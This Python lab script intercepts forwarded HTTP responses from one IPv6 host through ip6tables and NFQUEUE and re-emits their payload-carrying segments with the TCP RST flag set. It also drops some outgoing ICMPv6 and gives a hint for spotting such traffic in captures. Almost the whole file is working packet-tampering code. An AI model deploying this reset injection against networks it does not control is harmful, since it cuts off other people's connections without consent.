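#!/usr/bin/env python
"""Lab script: set the RST flag on queued HTTP responses from one IPv6 host.

An ip6tables rule sends forwarded TCP segments with source port 80 from a
single hard-coded IPv6 address to NFQUEUE 1.  Every queued segment that
carries payload is re-emitted with RST set; everything else is accepted
unchanged.

The script needs root, changes the host firewall while it runs, and should
only be used on a network you operate.  The original used Python 2 print
statements; ``print(x)`` with one argument behaves the same there.

For anyone looking at a capture of this traffic: the modified segments still
carry their HTTP payload and have RST set, which ordinary TCP stacks rarely
produce.
"""
# Import order kept from the original: the star import comes first so the
# plain module imports below win if scapy exports a name that clashes.
import nfqueue
from scapy.all import *
import os
import socket
import subprocess
import re
import urllib

QUEUE_NUM = 1

# Every rule this script installs, as (chain, rule-spec).  Keeping them in one
# place lets cleanup delete exactly these rules instead of flushing the table.
RULES = [
    # intercept web server responses
    ('FORWARD', ['-s', '2604:5f00:ffff:fe00::5353', '-p', 'tcp',
                 '--sport', '80', '-j', 'NFQUEUE',
                 '--queue-num', str(QUEUE_NUM)]),
    # needed for dns-resp-v6.py:
    ('OUTPUT', ['-p', 'ipv6-icmp', '-m', 'icmp6',
                '--icmpv6-type', '1/4', '-j', 'DROP']),
]
# Alternative left disabled by the author:
# ip6tables -A INPUT -p tcp --dport 80 -j NFQUEUE --queue-num 1


def _ip6tables(action, chain, spec):
    """Run ``ip6tables <action> <chain> <spec...>`` and return its exit status."""
    # Argument list, no shell: nothing here is parsed by /bin/sh.
    return subprocess.call(['ip6tables', action, chain] + spec)


def install_rules():
    """Append each entry of RULES; return the ones that were actually added."""
    installed = []
    for chain, spec in RULES:
        if _ip6tables('-A', chain, spec) == 0:
            installed.append((chain, spec))
        else:
            print("ip6tables could not add the rule to " + chain)
    return installed


def remove_rules(installed):
    """Delete the given rules (newest first) and leave all others untouched."""
    for chain, spec in reversed(installed):
        _ip6tables('-D', chain, spec)


# see comment in nfq-pass-all if you see TypeError regarding 2 arguments
# passed to callback; change signature to callback(i, payload)
def callback(payload):
    """Give a verdict for one queued packet.

    Segments that have both a TCP layer and a Raw (payload) layer are
    accepted in modified form with RST set; any other packet is accepted
    as it arrived.
    """
    data = payload.get_data()
    pkt = IPv6(data)
    print(pkt.summary())

    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        # Work on a copy so the parsed original stays intact.
        r = pkt.copy()
        # 0x4 is the RST bit; OR-ing keeps the flags already present.
        r[TCP].flags |= 0x4
        # None makes scapy recompute the TCP checksum when building.
        r[TCP].chksum = None
        # NOTE(review): the IPv6 header has no checksum field; kept from the
        # original, presumably redundant with the line above. Confirm.
        r[IPv6].chksum = None
        # The author left a second approach disabled here: send the RST as a
        # separate packet and accept the original unchanged.
        print("Sending RST on: " + r.summary())
        payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(r), len(r))
    else:
        payload.set_verdict(nfqueue.NF_ACCEPT)


def main():
    """Install the rules, serve queue QUEUE_NUM until Ctrl-C, then clean up.

    Cleanup runs on every exit path and deletes only the rules this script
    added.  The original ran ``ip6tables -F`` / ``-X``, which wiped the
    host's whole IPv6 filter table, and did so only on KeyboardInterrupt,
    so any other error left the rules in place.
    """
    installed = install_rules()
    try:
        q = nfqueue.queue()
        q.open()
        try:
            q.unbind(socket.AF_INET)
            q.bind(socket.AF_INET)  # callback won't be called without this
            q.set_callback(callback)
            q.create_queue(QUEUE_NUM)
            q.try_run()  # Main loop
        except KeyboardInterrupt:
            pass
        finally:
            q.unbind(socket.AF_INET)
            q.close()
    finally:
        print("Cleaning up iptables")
        remove_rules(installed)


if __name__ == "__main__":
    main()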